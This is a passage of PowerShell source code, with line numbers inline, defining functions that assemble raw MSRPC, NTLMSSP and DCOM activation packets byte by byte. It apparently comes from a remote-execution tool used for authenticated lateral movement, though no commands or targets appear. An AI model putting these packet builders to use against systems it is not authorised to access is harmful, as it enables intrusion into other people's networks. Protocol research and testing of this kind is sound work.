$packet_RPCAlterContext.Add("NumCtxItems",[Byte[]](0x01)) 242 | $packet_RPCAlterContext.Add("Unknown",[Byte[]](0x00,0x00,0x00)) 243 | $packet_RPCAlterContext.Add("ContextID",$packet_context_ID) 244 | $packet_RPCAlterContext.Add("NumTransItems",[Byte[]](0x01)) 245 | $packet_RPCAlterContext.Add("Unknown2",[Byte[]](0x00)) 246 | $packet_RPCAlterContext.Add("Interface",$packet_interface_UUID) 247 | $packet_RPCAlterContext.Add("InterfaceVer",[Byte[]](0x00,0x00)) 248 | $packet_RPCAlterContext.Add("InterfaceVerMinor",[Byte[]](0x00,0x00)) 249 | $packet_RPCAlterContext.Add("TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60)) 250 | $packet_RPCAlterContext.Add("TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00)) 251 | 252 | return $packet_RPCAlterContext 253 | } 254 | 255 | function New-PacketNTLMSSPVerifier 256 | { 257 | param([Int]$packet_auth_padding,[Byte[]]$packet_auth_level,[Byte[]]$packet_sequence_number) 258 | 259 | $packet_NTLMSSPVerifier = New-Object System.Collections.Specialized.OrderedDictionary 260 | 261 | if($packet_auth_padding -eq 4) 262 | { 263 | $packet_NTLMSSPVerifier.Add("AuthPadding",[Byte[]](0x00,0x00,0x00,0x00)) 264 | [Byte[]]$packet_auth_pad_length = 0x04 265 | } 266 | elseif($packet_auth_padding -eq 8) 267 | { 268 | $packet_NTLMSSPVerifier.Add("AuthPadding",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) 269 | [Byte[]]$packet_auth_pad_length = 0x08 270 | } 271 | elseif($packet_auth_padding -eq 12) 272 | { 273 | $packet_NTLMSSPVerifier.Add("AuthPadding",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) 274 | [Byte[]]$packet_auth_pad_length = 0x0c 275 | } 276 | else 277 | { 278 | [Byte[]]$packet_auth_pad_length = 0x00 279 | } 280 | 281 | $packet_NTLMSSPVerifier.Add("AuthType",[Byte[]](0x0a)) 282 | $packet_NTLMSSPVerifier.Add("AuthLevel",$packet_auth_level) 283 | $packet_NTLMSSPVerifier.Add("AuthPadLen",$packet_auth_pad_length) 284 | $packet_NTLMSSPVerifier.Add("AuthReserved",[Byte[]](0x00)) 285 | $packet_NTLMSSPVerifier.Add("AuthContextID",[Byte[]](0x00,0x00,0x00,0x00)) 286 | $packet_NTLMSSPVerifier.Add("NTLMSSPVerifierVersionNumber",[Byte[]](0x01,0x00,0x00,0x00)) 287 | $packet_NTLMSSPVerifier.Add("NTLMSSPVerifierChecksum",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) 288 | $packet_NTLMSSPVerifier.Add("NTLMSSPVerifierSequenceNumber",$packet_sequence_number) 289 | 290 | return $packet_NTLMSSPVerifier 291 | } 292 | 293 | function New-PacketDCOMRemQueryInterface 294 | { 295 | param([Byte[]]$packet_causality_ID,[Byte[]]$packet_IPID,[Byte[]]$packet_IID) 296 | 297 | $packet_DCOMRemQueryInterface = New-Object System.Collections.Specialized.OrderedDictionary 298 | $packet_DCOMRemQueryInterface.Add("VersionMajor",[Byte[]](0x05,0x00)) 299 | $packet_DCOMRemQueryInterface.Add("VersionMinor",[Byte[]](0x07,0x00)) 300 | $packet_DCOMRemQueryInterface.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00)) 301 | $packet_DCOMRemQueryInterface.Add("Reserved",[Byte[]](0x00,0x00,0x00,0x00)) 302 | $packet_DCOMRemQueryInterface.Add("CausalityID",$packet_causality_ID) 303 | $packet_DCOMRemQueryInterface.Add("Reserved2",[Byte[]](0x00,0x00,0x00,0x00)) 304 | $packet_DCOMRemQueryInterface.Add("IPID",$packet_IPID) 305 | $packet_DCOMRemQueryInterface.Add("Refs",[Byte[]](0x05,0x00,0x00,0x00)) 306 | $packet_DCOMRemQueryInterface.Add("IIDs",[Byte[]](0x01,0x00)) 307 | $packet_DCOMRemQueryInterface.Add("Unknown",[Byte[]](0x00,0x00,0x01,0x00,0x00,0x00)) 308 | $packet_DCOMRemQueryInterface.Add("IID",$packet_IID) 309 | 310 | return $packet_DCOMRemQueryInterface 311 | } 312 | 313 | function New-PacketDCOMRemRelease 314 | { 315 | param([Byte[]]$packet_causality_ID,[Byte[]]$packet_IPID,[Byte[]]$packet_IPID2) 316 | 317 | $packet_DCOMRemRelease = New-Object System.Collections.Specialized.OrderedDictionary 318 | $packet_DCOMRemRelease.Add("VersionMajor",[Byte[]](0x05,0x00)) 319 | $packet_DCOMRemRelease.Add("VersionMinor",[Byte[]](0x07,0x00)) 320 | $packet_DCOMRemRelease.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00)) 321 | $packet_DCOMRemRelease.Add("Reserved",[Byte[]](0x00,0x00,0x00,0x00)) 322 | $packet_DCOMRemRelease.Add("CausalityID",$packet_causality_ID) 323 | $packet_DCOMRemRelease.Add("Reserved2",[Byte[]](0x00,0x00,0x00,0x00)) 324 | $packet_DCOMRemRelease.Add("Unknown",[Byte[]](0x02,0x00,0x00,0x00)) 325 | $packet_DCOMRemRelease.Add("InterfaceRefs",[Byte[]](0x02,0x00,0x00,0x00)) 326 | $packet_DCOMRemRelease.Add("IPID",$packet_IPID) 327 | $packet_DCOMRemRelease.Add("PublicRefs",[Byte[]](0x05,0x00,0x00,0x00)) 328 | $packet_DCOMRemRelease.Add("PrivateRefs",[Byte[]](0x00,0x00,0x00,0x00)) 329 | $packet_DCOMRemRelease.Add("IPID2",$packet_IPID2) 330 | $packet_DCOMRemRelease.Add("PublicRefs2",[Byte[]](0x05,0x00,0x00,0x00)) 331 | $packet_DCOMRemRelease.Add("PrivateRefs2",[Byte[]](0x00,0x00,0x00,0x00)) 332 | 333 | return $packet_DCOMRemRelease 334 | } 335 | 336 | function New-PacketDCOMRemoteCreateInstance 337 | { 338 | param([Byte[]]$packet_causality_ID,[String]$packet_target) 339 | 340 | [Byte[]]$packet_target_unicode = [System.Text.Encoding]::Unicode.GetBytes($packet_target) 341 | [Byte[]]$packet_target_length = [System.BitConverter]::GetBytes($packet_target.Length + 1) 342 | $packet_target_unicode += ,0x00 * (([Math]::Truncate($packet_target_unicode.Length / 8 + 1) * 8) - $packet_target_unicode.Length) 343 | [Byte[]]$packet_cntdata = [System.BitConverter]::GetBytes($packet_target_unicode.Length + 720) 344 | [Byte[]]$packet_size = [System.BitConverter]::GetBytes($packet_target_unicode.Length + 680) 345 | [Byte[]]$packet_total_size = [System.BitConverter]::GetBytes($packet_target_unicode.Length + 664) 346 | [Byte[]]$packet_private_header = [System.BitConverter]::GetBytes($packet_target_unicode.Length + 40) + 0x00,0x00,0x00,0x00 347 | [Byte[]]$packet_property_data_size = [System.BitConverter]::GetBytes($packet_target_unicode.Length + 56) 348 | 349 | $packet_DCOMRemoteCreateInstance = New-Object System.Collections.Specialized.OrderedDictionary 350 | $packet_DCOMRemoteCreateInstance.Add("DCOMVersionMajor",[Byte[]](0x05,0x00)) 351 | $packet_DCOMRemoteCreateInstance.Add("DCOMVersionMinor",[Byte[]](0x07,0x00)) 352 | $packet_DCOMRemoteCreateInstance.Add("DCOMFlags",[Byte[]](0x01,0x00,0x00,0x00)) 353 | $packet_DCOMRemoteCreateInstance.Add("DCOMReserved",[Byte[]](0x00,0x00,0x00,0x00)) 354 | $packet_DCOMRemoteCreateInstance.Add("DCOMCausalityID",$packet_causality_ID) 355 | $packet_DCOMRemoteCreateInstance.Add("Unknown",[Byte[]](0x00,0x00,0x00,0x00)) 356 | $packet_DCOMRemoteCreateInstance.Add("Unknown2",[Byte[]](0x00,0x00,0x00,0x00)) 357 | $packet_DCOMRemoteCreateInstance.Add("Unknown3",[Byte[]](0x00,0x00,0x02,0x00)) 358 | $packet_DCOMRemoteCreateInstance.Add("Unknown4",$packet_cntdata) 359 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCntData",$packet_cntdata) 360 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesOBJREFSignature",[Byte[]](0x4d,0x45,0x4f,0x57)) 361 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesOBJREFFlags",[Byte[]](0x04,0x00,0x00,0x00)) 362 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesOBJREFIID",[Byte[]](0xa2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) 363 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFCLSID",[Byte[]](0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) 364 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFCBExtension",[Byte[]](0x00,0x00,0x00,0x00)) 365 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFSize",$packet_size) 366 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesTotalSize",$packet_total_size) 367 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesReserved",[Byte[]](0x00,0x00,0x00,0x00)) 368 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesCustomHeaderCommonHeader",[Byte[]](0x01,0x10,0x08,0x00,0xcc,0xcc,0xcc,0xcc)) 369 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesCustomHeaderPrivateHeader",[Byte[]](0xb0,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) 370 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesCustomHeaderTotalSize",$packet_total_size) 371 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesCustomHeaderCustomHeaderSize",[Byte[]](0xc0,0x00,0x00,0x00)) 372 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesCustomHeaderReserved",[Byte[]](0x00,0x00,0x00,0x00)) 373 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesDestinationContext",[Byte[]](0x02,0x00,0x00,0x00)) 374 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesNumActivationPropertyStructs",[Byte[]](0x06,0x00,0x00,0x00)) 375 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesClsInfoClsid",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) 376 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesClsIdPtrReferentID",[Byte[]](0x00,0x00,0x02,0x00)) 377 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesClsSizesPtrReferentID",[Byte[]](0x04,0x00,0x02,0x00)) 378 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesNULLPointer",[Byte[]](0x00,0x00,0x00,0x00)) 379 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesClsIdPtrMaxCount",[Byte[]](0x06,0x00,0x00,0x00)) 380 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesClsIdPtrPropertyStructGuid",[Byte[]](0xb9,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) 381 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesClsIdPtrPropertyStructGuid2",[Byte[]](0xab,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) 382 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesClsIdPtrPropertyStructGuid3",[Byte[]](0xa5,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) 383 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesClsIdPtrPropertyStructGuid4",[Byte[]](0xa6,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) 384 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesClsIdPtrPropertyStructGuid5",[Byte[]](0xa4,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) 385 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesClsIdPtrPropertyStructGuid6",[Byte[]](0xaa,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) 386 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesClsSizesPtrMaxCount",[Byte[]](0x06,0x00,0x00,0x00)) 387 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesClsSizesPtrPropertyDataSize",[Byte[]](0x68,0x00,0x00,0x00)) 388 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesClsSizesPtrPropertyDataSize2",[Byte[]](0x58,0x00,0x00,0x00)) 389 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesClsSizesPtrPropertyDataSize3",[Byte[]](0x90,0x00,0x00,0x00)) 390 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesClsSizesPtrPropertyDataSize4",$packet_property_data_size) 391 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesClsSizesPtrPropertyDataSize5",[Byte[]](0x20,0x00,0x00,0x00)) 392 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesClsSizesPtrPropertyDataSize6",[Byte[]](0x30,0x00,0x00,0x00)) 393 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesCommonHeader",[Byte[]](0x01,0x10,0x08,0x00,0xcc,0xcc,0xcc,0xcc)) 394 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesPrivateHeader",[Byte[]](0x58,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) 395 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesSessionID",[Byte[]](0xff,0xff,0xff,0xff)) 396 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesRemoteThisSessionID",[Byte[]](0x00,0x00,0x00,0x00)) 397 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesClientImpersonating",[Byte[]](0x00,0x00,0x00,0x00)) 398 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesPartitionIDPresent",[Byte[]](0x00,0x00,0x00,0x00)) 399 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesDefaultAuthnLevel",[Byte[]](0x02,0x00,0x00,0x00)) 400 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesPartitionGuid",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) 401 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesProcessRequestFlags",[Byte[]](0x00,0x00,0x00,0x00)) 402 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesOriginalClassContext",[Byte[]](0x14,0x00,0x00,0x00)) 403 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesFlags",[Byte[]](0x02,0x00,0x00,0x00)) 404 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesReserved",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) 405 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesUnusedBuffer",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) 406 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInfoCommonHeader",[Byte[]](0x01,0x10,0x08,0x00,0xcc,0xcc,0xcc,0xcc)) 407 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInfoPrivateHeader",[Byte[]](0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) 408 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInfoInstantiatedObjectClsId",[Byte[]](0x5e,0xf0,0xc3,0x8b,0x6b,0xd8,0xd0,0x11,0xa0,0x75,0x00,0xc0,0x4f,0xb6,0x88,0x20)) 409 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInfoClassContext",[Byte[]](0x14,0x00,0x00,0x00)) 410 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInfoActivationFlags",[Byte[]](0x00,0x00,0x00,0x00)) 411 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInfoFlagsSurrogate",[Byte[]](0x00,0x00,0x00,0x00)) 412 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInfoInterfaceIdCount",[Byte[]](0x01,0x00,0x00,0x00)) 413 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInfoInstantiationFlag",[Byte[]](0x00,0x00,0x00,0x00)) 414 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInterfaceIdsPtr",[Byte[]](0x00,0x00,0x02,0x00)) 415 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationEntirePropertySize",[Byte[]](0x58,0x00,0x00,0x00)) 416 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationVersionMajor",[Byte[]](0x05,0x00)) 417 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationVersionMinor",[Byte[]](0x07,0x00)) 418 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInterfaceIdsPtrMaxCount",[Byte[]](0x01,0x00,0x00,0x00)) 419 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInterfaceIds",[Byte[]](0x18,0xad,0x09,0xf3,0x6a,0xd8,0xd0,0x11,0xa0,0x75,0x00,0xc0,0x4f,0xb6,0x88,0x20)) 420 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInterfaceIdsUnusedBuffer",[Byte[]](0x00,0x00,0x00,0x00)) 421 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoCommonHeader",[Byte[]](0x01,0x10,0x08,0x00,0xcc,0xcc,0xcc,0xcc)) 422 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoPrivateHeader",[Byte[]](0x80,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) 423 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientOk",[Byte[]](0x00,0x00,0x00,0x00)) 424 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoReserved",[Byte[]](0x00,0x00,0x00,0x00)) 425 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoReserved2",[Byte[]](0x00,0x00,0x00,0x00)) 426 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoReserved3",[Byte[]](0x00,0x00,0x00,0x00)) 427 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrReferentID",[Byte[]](0x00,0x00,0x02,0x00)) 428 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoNULLPtr",[Byte[]](0x00,0x00,0x00,0x00)) 429 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrClientContextUnknown",[Byte[]](0x60,0x00,0x00,0x00)) 430 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrClientContextCntData",[Byte[]](0x60,0x00,0x00,0x00)) 431 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrClientContextOBJREFSignature",[Byte[]](0x4d,0x45,0x4f,0x57)) 432 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrClientContextOBJREFFlags",[Byte[]](0x04,0x00,0x00,0x00)) 433 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrClientContextOBJREFIID",[Byte[]](0xc0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) 434 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrClientContextOBJREFCUSTOMOBJREFCLSID",[Byte[]](0x3b,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) 435 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrClientContextOBJREFCUSTOMOBJREFCBExtension",[Byte[]](0x00,0x00,0x00,0x00)) 436 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrClientContextOBJREFCUSTOMOBJREFSize",[Byte[]](0x30,0x00,0x00,0x00)) 437 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoUnusedBuffer",[Byte[]](0x01,0x00,0x01,0x00,0x63,0x2c,0x80,0x2a,0xa5,0xd2,0xaf,0xdd,0x4d,0xc4,0xbb,0x37,0x4d,0x37,0x76,0xd7,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00)) 438 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoCommonHeader",[Byte[]](0x01,0x10,0x08,0x00,0xcc,0xcc,0xcc,0xcc)) 439 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoPrivateHeader",$packet_private_header) 440 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoAuthenticationFlags",[Byte[]](0x00,0x00,0x00,0x00)) 441 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoPtrReferentID",[Byte[]](0x00,0x00,0x02,0x00)) 442 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoNULLPtr",[Byte[]](0x00,0x00,0x00,0x00)) 443 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoServerInfoReserved",[Byte[]](0x00,0x00,0x00,0x00)) 444 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoServerInfoNameReferentID",[Byte[]](0x04,0x00,0x02,0x00)) 445 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoServerInfoNULLPtr",[Byte[]](0x00,0x00,0x00,0x00)) 446 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoServerInfoReserved2",[Byte[]](0x00,0x00,0x00,0x00)) 447 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoServerInfoNameMaxCount",$packet_target_length) 448 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoServerInfoNameOffset",[Byte[]](0x00,0x00,0x00,0x00)) 449 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoServerInfoNameActualCount",$packet_target_length) 450 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoServerInfoNameString",$packet_target_unicode) 451 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesLocationInfoCommonHeader",[Byte[]](0x01,0x10,0x08,0x00,0xcc,0xcc,0xcc,0xcc)) 452 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesLocationInfoPrivateHeader",[Byte[]](0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) 453 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesLocationInfoNULLPtr",[Byte[]](0x00,0x00,0x00,0x00)) 454 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesLocationInfoProcessID",[Byte[]](0x00,0x00,0x00,0x00)) 455 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesLocationInfoApartmentID",[Byte[]](0x00,0x00,0x00,0x00)) 456 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesLocationInfoContextID",[Byte[]](0x00,0x00,0x00,0x00)) 457 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoCommonHeader",[Byte[]](0x01,0x10,0x08,0x00,0xcc,0xcc,0xcc,0xcc)) 458 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoPrivateHeader",[Byte[]](0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) 459 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoNULLPtr",[Byte[]](0x00,0x00,0x00,0x00)) 460 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoRemoteRequestPtrReferentID",[Byte[]](0x00,0x00,0x02,0x00)) 461 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoRemoteRequestPtrRemoteRequestClientImpersonationLevel",[Byte[]](0x02,0x00,0x00,0x00)) 462 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoRemoteRequestPtrRemoteRequestNumProtocolSequences",[Byte[]](0x01,0x00)) 463 | 